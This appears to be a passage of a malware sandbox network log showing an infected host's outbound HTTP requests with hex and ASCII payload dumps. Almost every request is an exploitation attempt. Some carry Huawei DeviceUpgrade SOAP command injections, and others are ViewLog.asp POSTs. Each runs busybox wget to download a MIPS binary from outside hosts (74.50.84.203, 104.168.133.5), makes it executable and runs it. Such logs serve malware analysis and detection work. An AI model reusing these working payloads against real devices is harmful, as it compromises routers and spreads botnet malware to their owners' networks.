3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:31.270499945 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:38.950489044 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:54.310565948 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:25.030450106 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              280192.168.2.136077431.136.60.1768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.920887947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.966478109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.110467911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:47.142468929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.742404938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.894218922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              281192.168.2.133605462.29.120.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.958755016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              282192.168.2.133561631.200.54.428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.988217115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              283192.168.2.133686694.211.173.1588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.158663988 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:26.408884048 CET246INHTTP/1.1 404 Not Found
                                              Content-Length: 174
                                              Content-Encoding: gzip
                                              Vary: Accept-Encoding
                                              Server: CherryPy/8.1.2
                                              Date: Thu, 23 Nov 2023 04:16:26 GMT
                                              Content-Type: text/html


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              284192.168.2.133598494.121.125.898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.226392031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              285192.168.2.133350631.136.126.1068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:26.944061041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.990468025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:36.134468079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.166553974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
